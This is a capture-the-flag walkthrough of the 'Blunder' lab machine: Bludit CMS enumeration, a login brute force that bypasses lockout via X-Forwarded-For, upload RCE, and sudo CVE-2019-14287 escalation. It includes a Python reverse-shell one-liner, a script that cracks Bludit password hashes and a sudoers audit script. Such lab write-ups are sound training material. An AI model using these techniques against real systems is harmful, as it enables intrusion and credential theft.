# Blunder

## Information:

* OS: Linux
* Difficulty: Easy
* IP: 10.10.10.191

## Enumeration

Nmap

> nmap -sC -sS -sV -O -A -v -v 10.10.10.191

Output:

```

PORT   STATE  SERVICE REASON         VERSION
21/tcp closed ftp     reset ttl 63
80/tcp open   http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
```

Let's check the website (Apache running on port 80).

![image](https://user-images.githubusercontent.com/53917092/94908306-dbca0000-0477-11eb-86b0-3344ea6c0187.png)

Apparently it is a site about interesting facts.

Looking at the page source code:

![image](https://user-images.githubusercontent.com/53917092/94908933-c5707400-0478-11eb-8486-a10699c717da.png)

And this caught my attention:

![](https://user-images.githubusercontent.com/53917092/94909079-01a3d480-0479-11eb-8c15-6d81d2c6bce1.png)

We know the version is 3.9.2, but we still need to find out which CMS it is.

Fuzzing for directories and files turned up some paths under "bl-kernel".

Searching for this directory structure I found:

![image](https://user-images.githubusercontent.com/53917092/94910942-c9ea5c00-047b-11eb-8b4a-8e779842f1ca.png)

OK, the site is built on Bludit 3.9.2.

![image](https://user-images.githubusercontent.com/53917092/94911550-b2f83980-047c-11eb-929c-a93283949f78.png)

We can try an exploit for CVE-2019-16113 and get RCE (Remote Code Execution): in Bludit 3.9.2 an authenticated user can upload a file through `bl-kernel/ajax/upload-images.php`, and a directory traversal in the `uuid` parameter lets the attacker choose where it lands, so PHP code ends up somewhere the web server will execute it.

BUT

this exploit needs a username and password, which we do not know yet,

so let's find them.

For this, we can use:

![image](https://user-images.githubusercontent.com/53917092/94912365-eedfce80-047d-11eb-815d-b71854bbe5ee.png)

code:

<https://github.com/musyoka101/Bludit-CMS-Version-3.9.2-Brute-Force-Protection-Bypass-script/blob/master/bruteforce.py>

This script takes a wordlist and tries every word as the password. Bludit 3.9.2 blocks an IP after a number of failed logins, but it reads the client IP from the `X-Forwarded-For` header, so sending a different value on every attempt (CVE-2019-17240) means the lockout never triggers.

But we still need the username...

Back to the enumeration stage: the fuzzing also turns up a file named "todo.txt".

![](https://user-images.githubusercontent.com/53917092/94913801-4121ef00-0480-11eb-9699-fee431f23d1b.png)

Now we know that there is a user called fergus.

Now let's test passwords.

To generate a list of passwords that makes sense for this target, I will use a tool called "cewl", which scrapes the words from a site and assembles them into a wordlist:

> cewl 10.10.10.191 -w wordlist.txt

![](https://user-images.githubusercontent.com/53917092/94914325-3451cb00-0481-11eb-9ef1-0181e9c90e33.png)

Now let's use the script to find the password:

> python3 bruteforce.py 10.10.10.191 fergus wordlist.txt

![](https://user-images.githubusercontent.com/53917092/94914692-dffb1b00-0481-11eb-96db-6113f67f0615.png)

![](https://user-images.githubusercontent.com/53917092/94915471-58161080-0483-11eb-8a9a-346f0e508273.png)

Finally we have the password; now we can use the exploit for CVE-2019-16113.

## Getting Shell

![](https://user-images.githubusercontent.com/53917092/94916228-abd52980-0484-11eb-80eb-692e4106b982.png)

![](https://user-images.githubusercontent.com/53917092/94916325-e0e17c00-0484-11eb-9363-25d8843cd081.png)

![](https://user-images.githubusercontent.com/53917092/94916508-2b62f880-0485-11eb-974e-a2c2eed20340.png)

![](https://user-images.githubusercontent.com/53917092/94916617-65cc9580-0485-11eb-936c-f74dfa19cff5.png)

Now we have a shell, but a very poor one.

### Improving this shell

To improve this shell, we will make this connection spawn another shell back to a second listener. For this we will use:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

(changing the IP and port to those of your listener)

![](https://user-images.githubusercontent.com/53917092/94917382-d0320580-0486-11eb-9539-88e8bd9e5e22.png)

(On the right we have the better shell, but still not a TTY.)

To get a TTY, run:

> python -c 'import pty;pty.spawn("/bin/bash")'

To make it fully interactive (tab completion, Ctrl-C without losing the shell), background it with Ctrl-Z, run `stty raw -echo; fg` on your own terminal, and then `export TERM=xterm` in the target shell.

Now we need to move to a real user, since www-data cannot read the user flag.

Looking through the web root as www-data, I found a second Bludit install with its own user database:

> /var/www/bludit-3.10.0a/bl-content/databases/users.php

[![image](https://user-images.githubusercontent.com/53917092/94918936-ebeadb00-0489-11eb-98e1-24c1badcff20.png)](https://user-images.githubusercontent.com/53917092/94918936-ebeadb00-0489-11eb-98e1-24c1badcff20.png)

Here we see the user (hugo) and the password hash.

Now let's crack the hash.

First we need to identify which hash algorithm was used. Bludit stores `sha1(password + salt)`, so a plain SHA1 lookup only works when the record carries no salt, as is the case here.
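Doing the same offline, as an added example (not from the writeup): the script strips the PHP guard line from `users.php`, loads the JSON user table, and tries a wordlist with Bludit's `sha1(password + salt)`, so it also covers records that do have a salt and would not match an online SHA1 lookup. The two user records and their hashes below are constructed for the example; they are not the contents of the box's file.

```python
"""Parse a Bludit bl-content/databases/users.php and crack its SHA1 hashes.

Added example, not from the writeup. Bludit keeps its users as JSON behind a
one-line PHP guard and hashes passwords as sha1(password + salt). When a
record has no salt, the hash is a plain SHA1 of the password.
"""
import hashlib
import json
import re
from typing import Dict, Iterable, List, Optional

PHP_GUARD_RE = re.compile(r"^\s*<\?php.*?\?>\s*", re.DOTALL)


def parse_users_php(text: str) -> Dict[str, dict]:
    """Strip the leading `<?php ... ?>` guard and load the JSON user table."""
    payload = PHP_GUARD_RE.sub("", text, count=1)
    return json.loads(payload)


def bludit_hash(password: str, salt: str = "") -> str:
    """Bludit's password hash: SHA1 over password concatenated with salt."""
    return hashlib.sha1((password + salt).encode("utf-8")).hexdigest()


def crack_user(record: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Return the candidate whose Bludit hash matches this user's record."""
    target = record.get("password", "").lower()
    salt = record.get("salt", "") or ""          # missing salt -> plain SHA1
    if len(target) != 40:                        # not a SHA1 hex digest
        return None
    for word in wordlist:
        word = word.rstrip("\r\n")
        if bludit_hash(word, salt) == target:
            return word
    return None


def crack_all(users: Dict[str, dict], wordlist: List[str]) -> Dict[str, Optional[str]]:
    """Try every user; the wordlist is a list so it can be replayed per user."""
    return {name: crack_user(rec, wordlist) for name, rec in users.items()}


# Constructed sample users.php: one salted record and one unsalted record
# (the unsalted case is the one a plain SHA1 lookup site can resolve).
SAMPLE_USERS_PHP = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "role": "admin",
        "password": "%s",
        "salt": "5dde2887e7aca",
        "email": ""
    },
    "hugo": {
        "nickname": "Hugo",
        "role": "author",
        "password": "%s",
        "email": ""
    }
}
""" % (bludit_hash("summer2020", "5dde2887e7aca"), bludit_hash("letmein"))

# Constructed wordlist standing in for a cewl or rockyou file.
SAMPLE_WORDLIST = ["password", "letmein", "summer2020", "blunder"]

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:   # usage: python3 crack_users.py users.php wordlist.txt
        with open(sys.argv[1], encoding="utf-8") as f:
            users = parse_users_php(f.read())
        with open(sys.argv[2], encoding="utf-8", errors="ignore") as f:
            words = f.read().splitlines()
    else:
        users, words = parse_users_php(SAMPLE_USERS_PHP), SAMPLE_WORDLIST
    for name, pw in crack_all(users, words).items():
        print(f"{name}: {pw if pw else '<not cracked>'}")
```

Because the salt is appended rather than prepended, a record with a salt cannot be looked up in any precomputed SHA1 table; that is why checking for the `salt` key is the first thing to do before reaching for an online cracker.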

For this I will use a site called tunnelsup:

<https://www.tunnelsup.com/hash-analyzer/>

![](https://user-images.githubusercontent.com/53917092/94919144-57cd4380-048a-11eb-8dc3-59600f1b87bc.png)

Cracking it (<https://www.dcode.fr/sha1-hash>):

![](https://user-images.githubusercontent.com/53917092/94919344-b85c8080-048a-11eb-8135-c83bce488770.png)

Now that we have the password, let's switch to hugo:

![](https://user-images.githubusercontent.com/53917092/94919514-fb1e5880-048a-11eb-8a0d-1b0de989c0ea.png)

## Privilege Escalation

Running

> sudo -l

to see which commands we can run through sudo, we see that hugo may run "(ALL, !root) /bin/bash": /bin/bash as any user except root.

![](https://user-images.githubusercontent.com/53917092/115265571-bd72db80-a10d-11eb-8891-59a771a2000f.png)

Searching for this, we find that there is an exploit to escalate privileges: this is CVE-2019-14287, a bug in sudo before 1.8.28 where specifying the target user as `-u#-1` (uid -1, which sudo turned into 0) runs the command as root even though the rule excludes root.
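A small audit check for this misconfiguration, added here as an example and not part of the writeup or the exploit used below: it parses `sudo -l` output for runas specs of the form "ALL minus root", parses `sudo -V` for the version, and reports which commands CVE-2019-14287 would let a user run as root. The rule in the sample is the page's own "(ALL, !root) /bin/bash"; the hostname and version strings in the sample output are constructed.

```python
"""Spot the sudoers rule that CVE-2019-14287 turns into root.

Added example, not from the writeup. A runas spec like "(ALL, !root)" means
"any user except root". sudo before 1.8.28 accepted user id -1 (or its
unsigned form 4294967295), failed to map it, and ran the command as uid 0,
so the !root exclusion did not hold.
"""
import re
from typing import List, NamedTuple, Tuple


class Rule(NamedTuple):
    runas_users: Tuple[str, ...]
    command: str


# "    (ALL, !root) /bin/bash"  ->  group 1: "ALL, !root", group 2: "/bin/bash"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s+(.*\S)\s*$")


def parse_sudo_l(output: str) -> List[Rule]:
    """Extract (runas) command lines from `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group(1).split(":")[0]             # drop an optional ":group" part
        users = tuple(u.strip() for u in runas.split(",") if u.strip())
        rules.append(Rule(users, m.group(2)))
    return rules


def parse_sudo_version(sudo_v_output: str) -> Tuple[int, int, int]:
    """Turn 'Sudo version 1.8.25p1' into (1, 8, 25); the pN suffix is ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if not m:
        raise ValueError("could not find sudo version")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def version_affected(version: Tuple[int, int, int]) -> bool:
    """CVE-2019-14287 was fixed in sudo 1.8.28."""
    return version < (1, 8, 28)


def excludes_only_root(rule: Rule) -> bool:
    """True for runas specs that grant ALL but exclude root by name or uid 0."""
    users = {u.lower() for u in rule.runas_users}
    return "all" in users and bool(users & {"!root", "!#0"})


def cve_2019_14287_candidates(sudo_l_output: str, sudo_v_output: str) -> List[str]:
    """Commands the user could run as root with `sudo -u#-1 <cmd>`."""
    if not version_affected(parse_sudo_version(sudo_v_output)):
        return []
    return [r.command for r in parse_sudo_l(sudo_l_output) if excludes_only_root(r)]


# Constructed sample output: the rule is the one from the box, the hostname
# and version text are made up for the example.
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""
SAMPLE_SUDO_V = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"

if __name__ == "__main__":
    hits = cve_2019_14287_candidates(SAMPLE_SUDO_L, SAMPLE_SUDO_V)
    for cmd in hits:
        print(f"[+] runnable as root despite !root:  sudo -u#-1 {cmd}")
    if not hits:
        print("[-] no (ALL, !root) rule on an affected sudo version")
```

On a real host, feed it `sudo -l` and `sudo -V` output captured from the target; the version gate is what separates a genuinely exploitable rule from one that is merely sloppy.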

![](https://user-images.githubusercontent.com/53917092/94922594-e47b0000-0490-11eb-87dd-578465479847.png)

Let's use it.

I will download the script to my machine and start a Python HTTP server in that folder, so that on the target machine I can download it from my IP.

![](https://user-images.githubusercontent.com/53917092/94922852-49cef100-0491-11eb-86b7-8a5b96b3ff7e.png)

Now we are root; just grab the flag.

[![image](https://user-images.githubusercontent.com/53917092/94922938-6ec36400-0491-11eb-9a63-c5b123fe0a4d.png)](https://user-images.githubusercontent.com/53917092/94922938-6ec36400-0491-11eb-9a63-c5b123fe0a4d.png)
